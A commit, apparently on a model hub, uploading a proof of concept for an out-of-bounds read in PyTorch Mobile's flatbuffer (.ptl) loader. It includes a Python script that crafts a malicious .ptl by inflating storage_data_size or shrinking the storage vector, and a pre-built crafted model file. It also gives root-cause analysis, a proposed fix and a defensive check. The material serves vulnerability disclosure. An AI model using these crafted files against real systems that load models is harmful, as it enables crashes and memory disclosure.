0xiviel committed on
Commit 90bbdc6 · verified · 1 Parent(s): 5cc0884

Upload folder using huggingface_hub
README.md ADDED
@@ -0,0 +1,21 @@
# PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)

**Vulnerability:** `flatbuffer_loader.cpp:696-700`: `getStorage()` bounds-checks `index` against `storages_.size()` (sized from the `storage_data_size` int field) but then accesses `storage_data()` (the actual flatbuffer vector). A crafted `.ptl` file with `storage_data_size > storage_data()->size()` therefore causes an OOB read on the storage vector.

## Files

- `poc_flatbuf_storage_oob.py`: full PoC (creates the crafted `.ptl`, triggers SIGSEGV)
- `malicious_storage_oob.ptl`: pre-built crafted model

## Quick Start

```bash
pip install torch
python poc_flatbuf_storage_oob.py
```

## Expected Output

- Part 1: SIGSEGV crash from an inflated `storage_data_size` plus an OOB `storage_location_index`
- Part 2: Alternative attack that shrinks the storage vector length instead
- Part 3: Vulnerability details with code references
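
## The bug in miniature

The core mismatch can be modeled in a few lines of plain Python, no PyTorch required. `MockLoader` below is purely illustrative (a hypothetical stand-in, not PyTorch's loader); it only mirrors the flawed pattern: the bounds check consults a separately stored size field, while the actual access indexes the real vector.

```python
# Hypothetical model of the flawed check in getStorage().
# The check uses a size *field*; the access uses the real vector.

class MockLoader:
    def __init__(self, storage_data_size, storage_data):
        # storages_ is sized from the independent int field...
        self.storages_ = [None] * storage_data_size
        # ...while storage_data is the actual flatbuffer vector
        self.storage_data = storage_data

    def get_storage(self, index):
        # Mirrors TORCH_CHECK(index < storages_.size())
        if not index < len(self.storages_):
            raise IndexError("index out of bounds (checked size)")
        # Mirrors storage_data()->GetMutableObject(index): no check
        # against the real vector, so this can read out of bounds
        return self.storage_data[index]

# Honest file: the field matches the vector, so access is safe
ok = MockLoader(2, ["blobA", "blobB"])
assert ok.get_storage(1) == "blobB"

# Crafted file: storage_data_size inflated to 10, vector still length 2.
# Index 5 passes the size-field check but is OOB on the real vector.
evil = MockLoader(10, ["blobA", "blobB"])
try:
    evil.get_storage(5)
except IndexError as e:
    print("OOB reached past the bounds check:", e)
```

In the real loader the second access is a raw flatbuffer read, so instead of Python's `IndexError` the process reads out-of-bounds heap memory.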
__pycache__/poc_flatbuf_storage_oob.cpython-313.pyc ADDED
Binary file (20.3 kB).
 
malicious_storage_oob.ptl ADDED
Binary file (1.63 kB).
 
poc_flatbuf_storage_oob.py ADDED
@@ -0,0 +1,465 @@
#!/usr/bin/env python3
"""
PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)

Vulnerability: The flatbuffer loader's getStorage() method at
flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and
`index < storages_.size()`, but both vectors are sized from
`module->storage_data_size()`, an integer field in the flatbuffer schema
that is INDEPENDENT of the actual `storage_data()` vector.

A crafted .ptl file can set `storage_data_size` larger than the actual
`storage_data` vector length, then reference storage indices that pass the
bounds check but are OOB on the real vector. GetMutableObject(index) on the
flatbuffer vector reads past its bounds, interpreting random flatbuffer data
as a StorageData table -> heap OOB read, crash, or information disclosure.

Root cause:
- flatbuffer_loader.cpp:306-307: storages_ sized from storage_data_size (int field)
- flatbuffer_loader.cpp:697-698: bounds check against storages_.size()
- flatbuffer_loader.cpp:700: actual access on storage_data() (the real vector)
- NO check that storage_data_size <= storage_data()->size()

Tested: PyTorch 2.10.0+cpu on Python 3.13.11
"""

import os
import struct
import subprocess
import sys
import tempfile
import warnings

import torch
import torch.nn as nn

warnings.filterwarnings('ignore')


def create_valid_flatbuffer_ptl(output_path):
    """Create a valid .ptl flatbuffer model using PyTorch's serializer."""
    model = torch.jit.script(nn.Linear(4, 2))
    model._save_for_lite_interpreter(output_path, _use_flatbuffer=True)
    return output_path


def analyze_flatbuffer(data):
    """Parse the flatbuffer structure and return key offsets."""
    info = {}

    # Root table
    root_offset = struct.unpack_from('<I', data, 0)[0]
    info['root_table_pos'] = root_offset

    # VTable
    vtable_soffset = struct.unpack_from('<i', data, root_offset)[0]
    vtable_pos = root_offset - vtable_soffset
    info['vtable_pos'] = vtable_pos

    # storage_data_size field (VT_STORAGE_DATA_SIZE = 14, vtable index 5)
    sds_field_off = struct.unpack_from('<H', data, vtable_pos + 14)[0]
    if sds_field_off:
        info['storage_data_size_pos'] = root_offset + sds_field_off
        info['storage_data_size_val'] = struct.unpack_from(
            '<i', data, info['storage_data_size_pos']
        )[0]

    # storage_data vector (VT_STORAGE_DATA = 16, vtable index 6)
    sd_field_off = struct.unpack_from('<H', data, vtable_pos + 16)[0]
    if sd_field_off:
        sd_offset_pos = root_offset + sd_field_off
        sd_rel = struct.unpack_from('<I', data, sd_offset_pos)[0]
        sd_vec_pos = sd_offset_pos + sd_rel
        sd_vec_len = struct.unpack_from('<I', data, sd_vec_pos)[0]
        info['storage_data_vec_pos'] = sd_vec_pos
        info['storage_data_vec_len'] = sd_vec_len

    # Find TensorMetadata ivalues and their storage_location_index
    ivalues_field_off = struct.unpack_from('<H', data, vtable_pos + 12)[0]
    if ivalues_field_off:
        iv_offset_pos = root_offset + ivalues_field_off
        iv_rel = struct.unpack_from('<I', data, iv_offset_pos)[0]
        iv_vec_pos = iv_offset_pos + iv_rel
        iv_count = struct.unpack_from('<I', data, iv_vec_pos)[0]
        info['ivalues_count'] = iv_count
        info['tensor_metadata'] = []

        for i in range(iv_count):
            offset_pos = iv_vec_pos + 4 + i * 4
            rel = struct.unpack_from('<I', data, offset_pos)[0]
            ival_pos = offset_pos + rel

            # Read the IValue vtable
            iv_vt_soff = struct.unpack_from('<i', data, ival_pos)[0]
            iv_vt = ival_pos - iv_vt_soff
            iv_vt_size = struct.unpack_from('<H', data, iv_vt)[0]
            iv_num_fields = (iv_vt_size - 4) // 2

            # val_type (VT=4, field 0): uint8
            val_type = None
            if iv_num_fields >= 1:
                ft_off = struct.unpack_from('<H', data, iv_vt + 4)[0]
                if ft_off:
                    val_type = data[ival_pos + ft_off]

            # If TensorMetadata (type 5), find storage_location_index
            if val_type == 5:
                # val data (VT=6, field 1): offset to the union data
                fv_off = struct.unpack_from('<H', data, iv_vt + 6)[0]
                if fv_off:
                    val_rel = struct.unpack_from('<I', data, ival_pos + fv_off)[0]
                    tm_pos = ival_pos + fv_off + val_rel

                    # TensorMetadata vtable
                    tm_vt_soff = struct.unpack_from('<i', data, tm_pos)[0]
                    tm_vt = tm_pos - tm_vt_soff
                    tm_vt_size = struct.unpack_from('<H', data, tm_vt)[0]
                    tm_num_fields = (tm_vt_size - 4) // 2

                    # storage_location_index (VT=4, field 0): uint32
                    sli_val = 0  # default
                    sli_pos = None
                    if tm_num_fields >= 1:
                        sli_off = struct.unpack_from('<H', data, tm_vt + 4)[0]
                        if sli_off:
                            sli_pos = tm_pos + sli_off
                            sli_val = struct.unpack_from(
                                '<I', data, sli_pos
                            )[0]

                    info['tensor_metadata'].append({
                        'ivalue_index': i,
                        'tm_pos': tm_pos,
                        'storage_location_index': sli_val,
                        'sli_byte_pos': sli_pos,
                    })

    return info


def create_malicious_ptl(input_path, output_path, oob_index=5):
    """Modify a valid .ptl flatbuffer to trigger a storage vector OOB read.

    Strategy:
    1. Inflate storage_data_size beyond the actual storage_data vector length
    2. Modify a tensor's storage_location_index to reference an OOB index
    3. The loader's getStorage() passes its bounds check but reads OOB on the
       real vector
    """
    with open(input_path, 'rb') as f:
        data = bytearray(f.read())

    info = analyze_flatbuffer(data)

    orig_sds = info['storage_data_size_val']
    orig_vec_len = info['storage_data_vec_len']
    tensors = info['tensor_metadata']

    print(f"  Original storage_data_size: {orig_sds}")
    print(f"  Actual storage_data vector length: {orig_vec_len}")
    print(f"  TensorMetadata entries: {len(tensors)}")
    for tm in tensors:
        print(f"    ivalue[{tm['ivalue_index']}]: "
              f"storage_location_index={tm['storage_location_index']}"
              f" (byte {tm['sli_byte_pos']})")
    print()

    # Step 1: Inflate storage_data_size
    new_sds = oob_index + 5  # ensure oob_index < new_sds
    sds_pos = info['storage_data_size_pos']
    struct.pack_into('<i', data, sds_pos, new_sds)
    print(f"  [*] Changed storage_data_size: {orig_sds} -> {new_sds} "
          f"(at byte {sds_pos})")

    # Step 2: Find a tensor with an explicit storage_location_index and change
    # it to oob_index
    target_tm = None
    for tm in tensors:
        if tm['sli_byte_pos'] is not None:
            target_tm = tm
            break

    if target_tm is None:
        # All tensors use the default (0). Since the field is defaulted (not
        # written into the buffer), there is no byte to patch; instead, shrink
        # the storage_data vector length below the indices in use.
        print("  [*] No explicit storage_location_index found.")
        print("  [*] Alternative: reduce storage_data vector length to 0")
        print(f"      storage_data vector at byte {info['storage_data_vec_pos']}")
        # Set the vector length to 0; all indices become OOB
        vec_pos = info['storage_data_vec_pos']
        struct.pack_into('<I', data, vec_pos, 0)
        # Reset storage_data_size back to the original for the bounds check
        struct.pack_into('<i', data, sds_pos, orig_sds)
        print(f"  [*] Set storage_data vector length: {orig_vec_len} -> 0")
        print(f"  [*] storage_data_size remains {orig_sds}")
        print()
        print(f"  Result: getStorage(0) passes bounds check (0 < {orig_sds})")
        print("          but storage_data()->GetMutableObject(0) is OOB "
              "(vector length = 0)")
    else:
        orig_sli = target_tm['storage_location_index']
        sli_pos = target_tm['sli_byte_pos']
        struct.pack_into('<I', data, sli_pos, oob_index)
        print(f"  [*] Changed ivalue[{target_tm['ivalue_index']}] "
              f"storage_location_index: {orig_sli} -> {oob_index} "
              f"(at byte {sli_pos})")
        print()
        print(f"  Result: getStorage({oob_index}) passes bounds check "
              f"({oob_index} < {new_sds})")
        print(f"          but storage_data()->GetMutableObject({oob_index}) is OOB "
              f"(vector length = {orig_vec_len})")

    with open(output_path, 'wb') as f:
        f.write(data)

    print(f"\n  Saved: {output_path} ({len(data)} bytes)")
    return output_path


def demonstrate_vulnerability():
    """Show the vulnerability: a mismatch between storage_data_size and the
    actual storage_data vector causes an OOB read in getStorage()."""
    print()
    print("=" * 70)
    print(" Part 1: Vulnerability Demonstration")
    print("=" * 70)
    print()

    # Create a valid model
    tmpdir = tempfile.mkdtemp(prefix="ptl_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)

    # First verify the valid model loads fine
    print("  Step 1: Verify valid .ptl loads correctly")
    try:
        m = torch.jit.load(valid_path)
        print(f"  [+] Valid model loaded: {type(m)}")
        del m
    except Exception as e:
        print(f"  [-] Valid model failed: {e}")
        return False

    print()
    print("  Step 2: Create malicious .ptl with inflated storage_data_size")
    print()

    malicious_path = os.path.join(tmpdir, "malicious.ptl")
    create_malicious_ptl(valid_path, malicious_path, oob_index=5)

    print()
    print("  Step 3: Load malicious .ptl -> OOB read in getStorage()")
    print()

    # Load in a subprocess to capture the crash
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
    # Try accessing the model
    try:
        result = m.forward(torch.randn(1, 4))
        print(f"FORWARD_OK: {{result}}")
    except Exception as e:
        print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )

    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode

    print(f"  Return code: {retcode}")
    if stdout:
        print(f"  Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f"  Stderr: {line[:200]}")

    if retcode < 0:
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n  [+] CRASH: Process killed by {signame} (signal {signum})")
        print(f"  [+] OOB read in storage_data vector caused {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout:
        print("\n  [+] RuntimeError from corrupted flatbuffer data")
        return True
    elif "MODEL_LOADED" in stdout:
        print("\n  [!] Model loaded (OOB read happened silently)")
        return True
    else:
        print("\n  [-] Unexpected result")
        return False


def demonstrate_alternative_attack():
    """Alternative: shrink the storage_data vector length instead."""
    print()
    print("=" * 70)
    print(" Part 2: Alternative - Shrink storage_data vector length")
    print("=" * 70)
    print()

    tmpdir = tempfile.mkdtemp(prefix="ptl2_")
    valid_path = os.path.join(tmpdir, "valid.ptl")
    create_valid_flatbuffer_ptl(valid_path)

    with open(valid_path, 'rb') as f:
        data = bytearray(f.read())

    info = analyze_flatbuffer(data)
    vec_pos = info['storage_data_vec_pos']
    orig_len = info['storage_data_vec_len']
    sds = info['storage_data_size_val']

    print(f"  storage_data_size (int field): {sds}")
    print(f"  storage_data vector length: {orig_len}")
    print(f"  storage_data vector at byte: {vec_pos}")
    print()

    # Set the vector length to 0 but leave storage_data_size unchanged
    struct.pack_into('<I', data, vec_pos, 0)
    print(f"  [*] Set storage_data vector length: {orig_len} -> 0")
    print(f"  [*] storage_data_size remains: {sds}")
    print()
    print(f"  getStorage(0): passes bounds check (0 < {sds})")
    print("  storage_data()->GetMutableObject(0): OOB! vector length = 0")
    print()

    malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl")
    with open(malicious_path, 'wb') as f:
        f.write(data)

    print(f"  Saved: {malicious_path}")
    print()

    # Load in a subprocess
    poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
    m = torch.jit.load("{malicious_path}")
    print("MODEL_LOADED")
except RuntimeError as e:
    print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
    print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
    result = subprocess.run(
        [sys.executable, '-c', poc_script],
        capture_output=True, text=True, timeout=10
    )

    stdout = result.stdout.strip()
    stderr = result.stderr.strip()
    retcode = result.returncode

    print(f"  Return code: {retcode}")
    if stdout:
        print(f"  Stdout: {stdout[:300]}")
    if stderr:
        for line in stderr.strip().split('\n')[:5]:
            print(f"  Stderr: {line[:200]}")

    if retcode < 0:
        signum = -retcode
        try:
            import signal as sig
            signame = sig.Signals(signum).name
        except (ValueError, AttributeError):
            signame = f"signal {signum}"
        print(f"\n  [+] CRASH: Process killed by {signame}")
        return True
    elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout:
        print("\n  [+] Error from corrupted flatbuffer data")
        return True
    else:
        return False


def demonstrate_vulnerability_details():
    """Show the vulnerable code pattern."""
    print()
    print("=" * 70)
    print(" Part 3: Vulnerability Details")
    print("=" * 70)
    print()

    print("  The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):")
    print()
    print("    table Module {")
    print("      storage_data_size:int;        // integer field (line 205)")
    print("      storage_data:[StorageData];   // actual vector (line 206)")
    print("    }")
    print()
    print("  In parseModule() (flatbuffer_loader.cpp:306-307):")
    print("    storages_.resize(module->storage_data_size());  // uses INT field")
    print("    storage_loaded_.resize(module->storage_data_size(), false);")
    print()
    print("  In getStorage() (flatbuffer_loader.cpp:696-700):")
    print("    TORCH_CHECK(index < storage_loaded_.size());  // checks INT field")
    print("    TORCH_CHECK(index < storages_.size());        // checks INT field")
    print("    if (!storage_loaded_[index]) {")
    print("      auto* storage = module_->storage_data()  // accesses REAL vector!")
    print("                          ->GetMutableObject(index);  // OOB!")
    print()
    print("  The loader NEVER validates:")
    print("    storage_data_size <= storage_data()->size()")
    print()
    print("  FIX: Add validation in parseModule():")
    print("  ─────────────────────────────────────────────────────────")
    print("    TORCH_CHECK(")
    print("        module->storage_data() &&")
    print("        module->storage_data_size() <=")
    print("            static_cast<int>(module->storage_data()->size()),")
    print('        "storage_data_size exceeds actual storage_data vector");')
    print()


def main():
    print()
    print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)")
    print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
    print()

    ok1 = demonstrate_vulnerability()
    ok2 = demonstrate_alternative_attack()
    demonstrate_vulnerability_details()

    # Summary
    print("=" * 70)
    print(" RESULTS:")
    if ok1:
        print("  [+] Inflated storage_data_size: OOB on storage_data vector")
    if ok2:
        print("  [+] Shrunk storage_data vector: OOB on GetMutableObject()")
    print("  [+] Root cause: no validation that storage_data_size <=")
    print("      storage_data()->size() in flatbuffer_loader.cpp")
    print("  [+] Affects: PyTorch Mobile (.ptl flatbuffer format)")
    print("  [+] Fix: validate storage_data_size against actual vector length")
    print("=" * 70)


if __name__ == "__main__":
    main()
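
The parsing done in `analyze_flatbuffer` also suggests a defensive pre-load check on the consumer side. The sketch below is a hypothetical helper (not part of the PoC or of PyTorch) that reads the two fields using the same vtable slot offsets (14 and 16) the PoC assumes, and rejects a `.ptl` whose `storage_data_size` disagrees with the actual vector length; like the PoC, it assumes both fields are present in the vtable.

```python
import struct

def ptl_storage_fields(data):
    """Return (storage_data_size, actual storage_data vector length) from a
    .ptl flatbuffer, using the same vtable slots (14 and 16) the PoC assumes.
    Illustrative only; does not validate that the vtable contains the slots."""
    root = struct.unpack_from('<I', data, 0)[0]            # root table position
    vtable = root - struct.unpack_from('<i', data, root)[0]  # vtable position
    # storage_data_size (int field)
    sds_off = struct.unpack_from('<H', data, vtable + 14)[0]
    sds = struct.unpack_from('<i', data, root + sds_off)[0] if sds_off else 0
    # storage_data (actual vector): field holds a relative offset to the vector,
    # whose first uint32 is its length
    sd_off = struct.unpack_from('<H', data, vtable + 16)[0]
    if sd_off:
        vec_pos = root + sd_off + struct.unpack_from('<I', data, root + sd_off)[0]
        vec_len = struct.unpack_from('<I', data, vec_pos)[0]
    else:
        vec_len = 0
    return sds, vec_len

def looks_consistent(data):
    """Mirror of the proposed C++ fix: size field must not exceed the vector."""
    sds, vec_len = ptl_storage_fields(data)
    return sds <= vec_len
```

This is the Python analogue of the `TORCH_CHECK` proposed in Part 3: reject the file before any storage index is ever dereferenced.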